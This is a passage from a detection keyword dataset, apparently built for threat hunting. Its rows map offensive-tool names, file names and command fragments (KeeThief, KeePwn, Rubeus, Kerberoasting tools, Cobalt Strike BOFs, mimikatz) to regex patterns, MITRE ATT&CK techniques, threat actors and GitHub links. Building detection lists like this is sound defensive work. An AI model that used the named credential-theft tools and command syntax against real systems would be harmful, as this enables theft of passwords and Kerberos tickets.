the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1071","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*KeePassConfig.ps1*",".{0,1000}KeePassConfig\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*-KeePassConfigTrigger*",".{0,1000}\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*KeePassHax.dll*",".{0,1000}KeePassHax\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*keepass-password-dumper*",".{0,1000}keepass\-password\-dumper.{0,1000}","offensive_tool_keyword","keepass-password-dumper","KeePass Master Password Dumper is a simple proof-of-concept tool used to dump the master password from KeePass's memory. Apart from the first password character it is mostly able to recover the password in plaintext. No code execution on the target system is required. just a memory dump","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/vdohney/keepass-password-dumper","1","1","N/A","N/A","7","618","57","2023-08-17T19:26:55Z","2023-05-01T17:08:55Z" "*keepass-password-dumper*",".{0,1000}keepass\-password\-dumper.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn --*",".{0,1000}KeePwn\s\-\-.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn parse_dump *",".{0,1000}KeePwn\sparse_dump\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn plugin *",".{0,1000}KeePwn\splugin\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn plugin add -u * -p * -d * -t *",".{0,1000}KeePwn\splugin\sadd\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}\s\-t\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*KeePwn plugin check -u *",".{0,1000}KeePwn\splugin\scheck\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*KeePwn trigger *",".{0,1000}KeePwn\strigger\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn v* - by Julien BEDEL*",".{0,1000}KeePwn\sv.{0,1000}\s\-\sby\sJulien\sBEDEL.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*keepwn.__main__:main*",".{0,1000}keepwn\.__main__\:main.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*keepwn.core.parse_dump*",".{0,1000}keepwn\.core\.parse_dump.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*keepwn.core.plugin*",".{0,1000}keepwn\.core\.plugin.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*keepwn.core.search*",".{0,1000}keepwn\.core\.search.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*keepwn.core.trigger*",".{0,1000}keepwn\.core\.trigger.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn.py *",".{0,1000}KeePwn\.py\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn-main.zip*",".{0,1000}KeePwn\-main\.zip.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeeTheft/Dinvoke*",".{0,1000}KeeTheft\/Dinvoke.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*KeeThief*",".{0,1000}KeeThief.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*KeeThief.*",".{0,1000}KeeThief\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*KeeThief.ps1*",".{0,1000}KeeThief\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*KeeThiefSyscalls*",".{0,1000}KeeThiefSyscalls.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*keethief-syscalls*",".{0,1000}keethief\-syscalls.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*KerbDump\*-Tickets-KerbDump.txt*",".{0,1000}KerbDump\\.{0,1000}\-Tickets\-KerbDump\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*kerberoast /*",".{0,1000}kerberoast\s\/.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*kerberoast /*",".{0,1000}kerberoast\s\/.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Kerberoast Attack - Services Configured With a Weak Password*",".{0,1000}Kerberoast\sAttack\s\-\sServices\sConfigured\sWith\sa\sWeak\sPassword.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Kerberoast -username *",".{0,1000}Kerberoast\s\-username\s.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*Kerberoast(*",".{0,1000}Kerberoast\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*Kerberoast.*",".{0,1000}Kerberoast\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*kerberoast.py*",".{0,1000}kerberoast\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*Kerberoast.py*",".{0,1000}Kerberoast\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*kerberoast_attack*",".{0,1000}kerberoast_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*kerberoast_blind_output_*",".{0,1000}kerberoast_blind_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*kerberoast_john_results_*",".{0,1000}kerberoast_john_results_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*kerberoastables.txt*",".{0,1000}kerberoastables\.txt.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","286","43","2024-02-20T10:08:29Z","2021-08-02T20:19:35Z" "*kerberoasting*",".{0,1000}kerberoasting.{0,1000}","offensive_tool_keyword","OSCP-Cheatsheets","kerberoasting keyword. attack that allows any domain user to request kerberos tickets from TGS that are encrypted with NTLM hash of the plaintext password of a domain user account that is used as a service account (i.e account used for running an IIS service) and crack them offline avoiding AD account lockouts.","T1558 - T1208 - T1003 - T1110","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting.md","1","1","N/A","N/A","1","89","34","2019-09-09T22:07:47Z","2019-09-12T22:07:31Z" "*kerberoasting.boo*",".{0,1000}kerberoasting\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*kerberoasting.x64*",".{0,1000}kerberoasting\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*KerberOPSEC.csproj*",".{0,1000}KerberOPSEC\.csproj.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*KerberOPSEC.exe*",".{0,1000}KerberOPSEC\.exe.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*KerberOPSEC-x64.exe*",".{0,1000}KerberOPSEC\-x64\.exe.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*KerberOPSEC-x86.exe*",".{0,1000}KerberOPSEC\-x86\.exe.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*Kerberos abuse (kerbeus BOF)*",".{0,1000}Kerberos\sabuse\s\(kerbeus\sBOF\).{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*kerberos*.kirbi*",".{0,1000}kerberos.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*kerberos/decryptor.py*",".{0,1000}kerberos\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*kerberos::ask*",".{0,1000}kerberos\:\:ask.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also 